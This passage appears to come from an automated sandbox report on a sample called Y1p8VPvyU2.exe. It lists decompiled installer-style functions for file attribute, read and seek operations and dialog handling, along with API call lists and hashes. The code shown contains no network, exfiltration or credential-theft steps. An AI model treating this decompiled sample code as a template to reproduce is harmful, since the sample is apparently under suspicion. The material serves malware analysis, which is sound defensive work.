                                      • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                      • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                      • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                      • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00405602(CHAR* _a4, long _a8, long _a12) {
                                      				signed int _t5;
                                      				void* _t6;
                                      
                                      				_t5 = GetFileAttributesA(_a4); // executed
                                      				asm("sbb ecx, ecx");
                                      				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                      				return _t6;
                                      			}






                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405606
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                      • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                      • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                      • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004055E3(CHAR* _a4) {
                                      				signed char _t3;
                                      
                                      				_t3 = GetFileAttributesA(_a4); // executed
                                      				if(_t3 != 0xffffffff) {
                                      					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                      				}
                                      				return _t3;
                                      			}





                                      APIs
                                      • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                      • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                      • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                      • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403066(void* _a4, long _a8) {
                                      				int _t6;
                                      				long _t10;
                                      
                                      				_t10 = _a8;
                                      				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                      				if(_t6 == 0 || _a8 != _t10) {
                                      					return 0;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}






                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                      • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                      • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                      • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403098(long _a4) {
                                      				long _t2;
                                      
                                      				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                      				return _t2;
                                      			}





                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                      • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                      • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                      • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 98%
                                      			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                      				struct HWND__* _v8;
                                      				struct HWND__* _v12;
                                      				signed int _v16;
                                      				intOrPtr _v20;
                                      				void* _v24;
                                      				long _v28;
                                      				int _v32;
                                      				signed int _v40;
                                      				int _v44;
                                      				signed int* _v56;
                                      				intOrPtr _v60;
                                      				signed int _v64;
                                      				long _v68;
                                      				void* _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				void* _v84;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				struct HWND__* _t182;
                                      				intOrPtr _t183;
                                      				int _t189;
                                      				int _t196;
                                      				intOrPtr _t198;
                                      				long _t202;
                                      				signed int _t206;
                                      				signed int _t217;
                                      				void* _t220;
                                      				void* _t221;
                                      				int _t227;
                                      				intOrPtr _t231;
                                      				signed int _t232;
                                      				signed int _t233;
                                      				signed int _t240;
                                      				signed int _t242;
                                      				signed int _t245;
                                      				signed int _t247;
                                      				struct HBITMAP__* _t250;
                                      				void* _t252;
                                      				char* _t268;
                                      				signed char _t269;
                                      				long _t274;
                                      				int _t280;
                                      				signed int* _t281;
                                      				int _t282;
                                      				long _t283;
                                      				signed int* _t284;
                                      				int _t285;
                                      				long _t286;
                                      				signed int _t287;
                                      				long _t288;
                                      				signed int _t291;
                                      				int _t294;
                                      				signed int _t298;
                                      				signed int _t300;
                                      				signed int _t302;
                                      				intOrPtr _t309;
                                      				int* _t310;
                                      				void* _t311;
                                      				int _t315;
                                      				int _t316;
                                      				int _t317;
                                      				signed int _t318;
                                      				void* _t320;
                                      				void* _t328;
                                      				void* _t331;
                                      
                                      				_v12 = GetDlgItem(_a4, 0x3f9);
                                      				_t182 = GetDlgItem(_a4, 0x408);
                                      				_t280 =  *0x42eb88; // 0x7203fc
                                      				_t320 = SendMessageA;
                                      				_v8 = _t182;
                                      				_t183 =  *0x42eb70; // 0x720250
                                      				_t315 = 0;
                                      				_v32 = _t280;
                                      				_v20 = _t183 + 0x94;
                                      				if(_a8 != 0x110) {
                                      					L23:
                                      					__eflags = _a8 - 0x405;
                                      					if(_a8 != 0x405) {
                                      						_t289 = _a16;
                                      					} else {
                                      						_a12 = _t315;
                                      						_t289 = 1;
                                      						_a8 = 0x40f;
                                      						_a16 = 1;
                                      					}
                                      					__eflags = _a8 - 0x4e;
                                      					if(_a8 == 0x4e) {
                                      						L28:
                                      						__eflags = _a8 - 0x413;
                                      						_v16 = _t289;
                                      						if(_a8 == 0x413) {
                                      							L30:
                                      							__eflags =  *0x42eb79 & 0x00000002;
                                      							if(( *0x42eb79 & 0x00000002) != 0) {
                                      								L41:
                                      								__eflags = _v16 - _t315;
                                      								if(_v16 != _t315) {
                                      									_t232 = _v16;
                                      									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                      									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                      										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                      									}
                                      									_t233 = _v16;
                                      									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                      									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                      										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                      										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                      											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                      											 *_t284 =  *_t284 & 0xffffffdf;
                                      											__eflags =  *_t284;
                                      										} else {
                                      											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                      										}
                                      									}
                                      								}
                                      								goto L48;
                                      							}
                                      							__eflags = _a8 - 0x413;
                                      							if(_a8 == 0x413) {
                                      								L33:
                                      								__eflags = _a8 - 0x413;
                                      								_t289 = 0 | _a8 != 0x00000413;
                                      								_t240 = E00404598(_v8, _a8 != 0x413);
                                      								__eflags = _t240 - _t315;
                                      								if(_t240 >= _t315) {
                                      									_t93 = _t280 + 8; // 0x8
                                      									_t310 = _t240 * 0x418 + _t93;
                                      									_t289 =  *_t310;
                                      									__eflags = _t289 & 0x00000010;
                                      									if((_t289 & 0x00000010) == 0) {
                                      										__eflags = _t289 & 0x00000040;
                                      										if((_t289 & 0x00000040) == 0) {
                                      											_t298 = _t289 ^ 0x00000001;
                                      											__eflags = _t298;
                                      										} else {
                                      											_t300 = _t289 ^ 0x00000080;
                                      											__eflags = _t300;
                                      											if(_t300 >= 0) {
                                      												_t298 = _t300 & 0xfffffffe;
                                      											} else {
                                      												_t298 = _t300 | 0x00000001;
                                      											}
                                      										}
                                      										 *_t310 = _t298;
                                      										E0040117D(_t240);
                                      										_t242 =  *0x42eb78; // 0x80
                                      										_t289 = 1;
                                      										_a8 = 0x40f;
                                      										_t245 =  !_t242 >> 0x00000008 & 1;
                                      										__eflags = _t245;
                                      										_a12 = 1;
                                      										_a16 = _t245;
                                      									}
                                      								}
                                      								goto L41;
                                      							}
                                      							_t289 = _a16;
                                      							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                      							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                      								goto L41;
                                      							}
                                      							goto L33;
                                      						}
                                      						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                      						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                      							goto L48;
                                      						}
                                      						goto L30;
                                      					} else {
                                      						__eflags = _a8 - 0x413;
                                      						if(_a8 != 0x413) {
                                      							L48:
                                      							__eflags = _a8 - 0x111;
                                      							if(_a8 != 0x111) {
                                      								L56:
                                      								__eflags = _a8 - 0x200;
                                      								if(_a8 == 0x200) {
                                      									SendMessageA(_v8, 0x200, _t315, _t315);
                                      								}
                                      								__eflags = _a8 - 0x40b;
                                      								if(_a8 == 0x40b) {
                                      									_t220 =  *0x429fb4;
                                      									__eflags = _t220 - _t315;
                                      									if(_t220 != _t315) {
                                      										ImageList_Destroy(_t220);
                                      									}
                                      									_t221 =  *0x429fcc;
                                      									__eflags = _t221 - _t315;
                                      									if(_t221 != _t315) {
                                      										GlobalFree(_t221);
                                      									}
                                      									 *0x429fb4 = _t315;
                                      									 *0x429fcc = _t315;
                                      									 *0x42ebc0 = _t315;
                                      								}
                                      								__eflags = _a8 - 0x40f;
                                      								if(_a8 != 0x40f) {
                                      									L86:
                                      									__eflags = _a8 - 0x420;
                                      									if(_a8 == 0x420) {
                                      										__eflags =  *0x42eb79 & 0x00000001;
                                      										if(( *0x42eb79 & 0x00000001) != 0) {
                                      											__eflags = _a16 - 0x20;
                                      											_t189 = (0 | _a16 == 0x00000020) << 3;
                                      											__eflags = _t189;
                                      											_t316 = _t189;
                                      											ShowWindow(_v8, _t316);
                                      											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                      										}
                                      									}
                                      									goto L89;
                                      								} else {
                                      									E004011EF(_t289, _t315, _t315);
                                      									__eflags = _a12 - _t315;
                                      									if(_a12 != _t315) {
                                      										E0040140B(8);
                                      									}
                                      									__eflags = _a16 - _t315;
                                      									if(_a16 == _t315) {
                                      										L73:
                                      										E004011EF(_t289, _t315, _t315);
                                      										__eflags =  *0x42eb8c - _t315; // 0x4
                                      										_v32 =  *0x429fcc;
                                      										_t196 =  *0x42eb88; // 0x7203fc
                                      										_v60 = 0xf030;
                                      										_v16 = _t315;
                                      										if(__eflags <= 0) {
                                      											L84:
                                      											InvalidateRect(_v8, _t315, 1);
                                      											_t198 =  *0x42e33c; // 0x7278ea
                                      											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                      											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                      												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                                      											}
                                      											goto L86;
                                      										} else {
                                      											_t142 = _t196 + 8; // 0x720404
                                      											_t281 = _t142;
                                      											do {
                                      												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                      												__eflags = _t202 - _t315;
                                      												if(_t202 != _t315) {
                                      													_t291 =  *_t281;
                                      													_v68 = _t202;
                                      													__eflags = _t291 & 0x00000001;
                                      													_v72 = 8;
                                      													if((_t291 & 0x00000001) != 0) {
                                      														_t151 =  &(_t281[4]); // 0x720414
                                      														_v72 = 9;
                                      														_v56 = _t151;
                                      														_t154 =  &(_t281[0]);
                                      														 *_t154 = _t281[0] & 0x000000fe;
                                      														__eflags =  *_t154;
                                      													}
                                      													__eflags = _t291 & 0x00000040;
                                      													if((_t291 & 0x00000040) == 0) {
                                      														_t206 = (_t291 & 0x00000001) + 1;
                                      														__eflags = _t291 & 0x00000010;
                                      														if((_t291 & 0x00000010) != 0) {
                                      															_t206 = _t206 + 3;
                                      															__eflags = _t206;
                                      														}
                                      													} else {
                                      														_t206 = 3;
                                      													}
                                      													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                      													__eflags = _t294;
                                      													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                      													SendMessageA(_v8, 0x1102, _t294, _v68);
                                      													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                      												}
                                      												_v16 = _v16 + 1;
                                      												_t281 =  &(_t281[0x106]);
                                      												__eflags = _v16 -  *0x42eb8c; // 0x4
                                      											} while (__eflags < 0);
                                      											goto L84;
                                      										}
                                      									} else {
                                      										_t282 = E004012E2( *0x429fcc);
                                      										E00401299(_t282);
                                      										_t217 = 0;
                                      										_t289 = 0;
                                      										__eflags = _t282 - _t315;
                                      										if(_t282 <= _t315) {
                                      											L72:
                                      											SendMessageA(_v12, 0x14e, _t289, _t315);
                                      											_a16 = _t282;
                                      											_a8 = 0x420;
                                      											goto L73;
                                      										} else {
                                      											goto L69;
                                      										}
                                      										do {
                                      											L69:
                                      											_t309 = _v20;
                                      											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                      											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                      												_t289 = _t289 + 1;
                                      												__eflags = _t289;
                                      											}
                                      											_t217 = _t217 + 1;
                                      											__eflags = _t217 - _t282;
                                      										} while (_t217 < _t282);
                                      										goto L72;
                                      									}
                                      								}
                                      							}
                                      							__eflags = _a12 - 0x3f9;
                                      							if(_a12 != 0x3f9) {
                                      								goto L89;
                                      							}
                                      							__eflags = _a12 >> 0x10 - 1;
                                      							if(_a12 >> 0x10 != 1) {
                                      								goto L89;
                                      							}
                                      							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                      							__eflags = _t227 - 0xffffffff;
                                      							if(_t227 == 0xffffffff) {
                                      								goto L89;
                                      							}
                                      							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                      							__eflags = _t283 - 0xffffffff;
                                      							if(_t283 == 0xffffffff) {
                                      								L54:
                                      								_t283 = 0x20;
                                      								L55:
                                      								E00401299(_t283);
                                      								SendMessageA(_a4, 0x420, _t315, _t283);
                                      								_a12 = 1;
                                      								_a16 = _t315;
                                      								_a8 = 0x40f;
                                      								goto L56;
                                      							}
                                      							_t231 = _v20;
                                      							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                      							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                      								goto L55;
                                      							}
                                      							goto L54;
                                      						}
                                      						goto L28;
                                      					}
                                      				} else {
                                      					 *0x42ebc0 = _a4;
                                      					_t247 =  *0x42eb8c; // 0x4
                                      					_t285 = 2;
                                      					_v28 = 0;
                                      					_v16 = _t285;
                                      					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                                      					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                                      					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                                      					_v24 = _t250;
                                      					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                                      					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                      					 *0x429fb4 = _t252;
                                      					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                      					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                                      					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                      						SendMessageA(_v8, 0x111b, 0x10, 0);
                                      					}
                                      					DeleteObject(_v24);
                                      					_t286 = 0;
                                      					do {
                                      						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                      						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                      							if(_t286 != 0x20) {
                                      								_v16 = _t315;
                                      							}
                                      							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                      						}
                                      						_t286 = _t286 + 1;
                                      					} while (_t286 < 0x21);
                                      					_t317 = _a16;
                                      					_t287 = _v16;
                                      					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                      					_push(0x15);
                                      					E00403CDD(_a4);
                                      					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                      					_push(0x16);
                                      					E00403CDD(_a4);
                                      					_t318 = 0;
                                      					_t288 = 0;
                                      					_t328 =  *0x42eb8c - _t318; // 0x4
                                      					if(_t328 <= 0) {
                                      						L19:
                                      						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                      						goto L20;
                                      					} else {
                                      						_t311 = _v32 + 8;
                                      						_v24 = _t311;
                                      						do {
                                      							_t268 = _t311 + 0x10;
                                      							if( *_t268 != 0) {
                                      								_v60 = _t268;
                                      								_t269 =  *_t311;
                                      								_t302 = 0x20;
                                      								_v84 = _t288;
                                      								_v80 = 0xffff0002;
                                      								_v76 = 0xd;
                                      								_v64 = _t302;
                                      								_v40 = _t318;
                                      								_v68 = _t269 & _t302;
                                      								if((_t269 & 0x00000002) == 0) {
                                      									__eflags = _t269 & 0x00000004;
                                      									if((_t269 & 0x00000004) == 0) {
                                      										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                      									} else {
                                      										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                      									}
                                      								} else {
                                      									_v76 = 0x4d;
                                      									_v44 = 1;
                                      									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                      									_v28 = 1;
                                      									 *( *0x429fcc + _t318 * 4) = _t274;
                                      									_t288 =  *( *0x429fcc + _t318 * 4);
                                      								}
                                      							}
                                      							_t318 = _t318 + 1;
                                      							_t311 = _v24 + 0x418;
                                      							_t331 = _t318 -  *0x42eb8c; // 0x4
                                      							_v24 = _t311;
                                      						} while (_t331 < 0);
                                      						if(_v28 != 0) {
                                      							L20:
                                      							if(_v16 != 0) {
                                      								E00403D12(_v8);
                                      								_t280 = _v32;
                                      								_t315 = 0;
                                      								__eflags = 0;
                                      								goto L23;
                                      							} else {
                                      								ShowWindow(_v12, 5);
                                      								E00403D12(_v12);
                                      								L89:
                                      								return E00403D44(_a8, _a12, _a16);
                                      							}
                                      						}
                                      						goto L19;
                                      					}
                                      				}
                                      			}

                                      0x00404aa5
                                      0x00404aaa
                                      0x00404aac
                                      0x00404aae
                                      0x00404ab0
                                      0x00404ac0
                                      0x00404aca
                                      0x00404acc
                                      0x00404acf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404ab2
                                      0x00404ab2
                                      0x00404ab2
                                      0x00404ab5
                                      0x00404ab8
                                      0x00404aba
                                      0x00404aba
                                      0x00404aba
                                      0x00404abb
                                      0x00404abc
                                      0x00404abc
                                      0x00000000
                                      0x00404ab2
                                      0x00404a95
                                      0x00404a79
                                      0x004049b0
                                      0x004049b6
                                      0x00000000
                                      0x00000000
                                      0x004049c2
                                      0x004049c6
                                      0x00000000
                                      0x00000000
                                      0x004049d6
                                      0x004049d8
                                      0x004049db
                                      0x00000000
                                      0x00000000
                                      0x004049ed
                                      0x004049ef
                                      0x004049f2
                                      0x004049fc
                                      0x004049fe
                                      0x004049ff
                                      0x00404a00
                                      0x00404a0f
                                      0x00404a11
                                      0x00404a18
                                      0x00404a1b
                                      0x00000000
                                      0x00404a1b
                                      0x004049f4
                                      0x004049f7
                                      0x004049fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004049fa
                                      0x00000000
                                      0x004048ba
                                      0x0040466c
                                      0x00404671
                                      0x00404676
                                      0x0040467b
                                      0x0040467c
                                      0x00404685
                                      0x00404690
                                      0x0040469b
                                      0x004046a1
                                      0x004046af
                                      0x004046c4
                                      0x004046c9
                                      0x004046d4
                                      0x004046dd
                                      0x004046f2
                                      0x00404703
                                      0x00404710
                                      0x00404710
                                      0x00404715
                                      0x0040471b
                                      0x0040471d
                                      0x00404720
                                      0x00404725
                                      0x0040472a
                                      0x0040472c
                                      0x0040472c
                                      0x0040474c
                                      0x0040474c
                                      0x0040474e
                                      0x0040474f
                                      0x00404754
                                      0x00404757
                                      0x0040475a
                                      0x0040475e
                                      0x00404763
                                      0x00404768
                                      0x0040476c
                                      0x00404771
                                      0x00404776
                                      0x00404778
                                      0x0040477a
                                      0x00404780
                                      0x0040484a
                                      0x0040485d
                                      0x00000000
                                      0x00404786
                                      0x00404789
                                      0x0040478c
                                      0x0040478f
                                      0x0040478f
                                      0x00404795
                                      0x0040479b
                                      0x0040479e
                                      0x004047a4
                                      0x004047a5
                                      0x004047aa
                                      0x004047b3
                                      0x004047ba
                                      0x004047bd
                                      0x004047c0
                                      0x004047c3
                                      0x004047fd
                                      0x004047ff
                                      0x00404828
                                      0x00404801
                                      0x0040480e
                                      0x0040480e
                                      0x004047c5
                                      0x004047c8
                                      0x004047d7
                                      0x004047e1
                                      0x004047e9
                                      0x004047f0
                                      0x004047f8
                                      0x004047f8
                                      0x004047c3
                                      0x0040482e
                                      0x0040482f
                                      0x00404835
                                      0x0040483b
                                      0x0040483b
                                      0x00404848
                                      0x00404863
                                      0x00404867
                                      0x00404884
                                      0x00404889
                                      0x0040488c
                                      0x0040488c
                                      0x00000000
                                      0x00404869
                                      0x0040486e
                                      0x00404877
                                      0x00404c04
                                      0x00404c16
                                      0x00404c16
                                      0x00404867
                                      0x00000000
                                      0x00404848
                                      0x00404780

                                      APIs
                                      • GetDlgItem.USER32 ref: 0040462F
                                      • GetDlgItem.USER32 ref: 0040463C
                                      • GlobalAlloc.KERNEL32(00000040,00000004), ref: 00404688
                                      • LoadBitmapA.USER32 ref: 0040469B
                                      • SetWindowLongA.USER32(?,000000FC,00404C19), ref: 004046B5
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                                      • DeleteObject.GDI32(?), ref: 00404715
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                                      • GetWindowLongA.USER32 ref: 0040484F
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040485D
                                      • ShowWindow.USER32(?,00000005), ref: 0040486E
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                                      • GlobalFree.KERNEL32 ref: 00404A5A
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                                      • ShowWindow.USER32(?,00000000), ref: 00404BF0
                                      • GetDlgItem.USER32 ref: 00404BFB
                                      • ShowWindow.USER32(00000000), ref: 00404C02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N$xr
                                      • API String ID: 1638840714-180083718
                                      • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                      • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                      • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                      • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                      				struct HWND__* _v8;
                                      				long _v12;
                                      				struct tagRECT _v28;
                                      				void* _v36;
                                      				signed int _v40;
                                      				int _v44;
                                      				int _v48;
                                      				signed int _v52;
                                      				int _v56;
                                      				void* _v60;
                                      				void* _v68;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				long _t87;
                                      				unsigned int _t92;
                                      				unsigned int _t93;
                                      				int _t94;
                                      				int _t95;
                                      				long _t98;
                                      				void* _t101;
                                      				intOrPtr _t123;
                                      				struct HWND__* _t127;
                                      				int _t149;
                                      				int _t150;
                                      				struct HWND__* _t154;
                                      				struct HWND__* _t158;
                                      				struct HMENU__* _t160;
                                      				long _t162;
                                      				void* _t163;
                                      				short* _t164;
                                      
                                      				_t154 =  *0x42e344; // 0x0
                                      				_t149 = 0;
                                      				_v8 = _t154;
                                      				if(_a8 != 0x110) {
                                      					__eflags = _a8 - 0x405;
                                      					if(_a8 == 0x405) {
                                      						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                      					}
                                      					__eflags = _a8 - 0x111;
                                      					if(_a8 != 0x111) {
                                      						L17:
                                      						__eflags = _a8 - 0x404;
                                      						if(_a8 != 0x404) {
                                      							L25:
                                      							__eflags = _a8 - 0x7b;
                                      							if(_a8 != 0x7b) {
                                      								goto L20;
                                      							}
                                      							__eflags = _a12 - _t154;
                                      							if(_a12 != _t154) {
                                      								goto L20;
                                      							}
                                      							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                      							__eflags = _t87 - _t149;
                                      							_a8 = _t87;
                                      							if(_t87 <= _t149) {
                                      								L37:
                                      								return 0;
                                      							}
                                      							_t160 = CreatePopupMenu();
                                      							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                      							_t92 = _a16;
                                      							__eflags = _t92 - 0xffffffff;
                                      							if(_t92 != 0xffffffff) {
                                      								_t150 = _t92;
                                      								_t93 = _t92 >> 0x10;
                                      								__eflags = _t93;
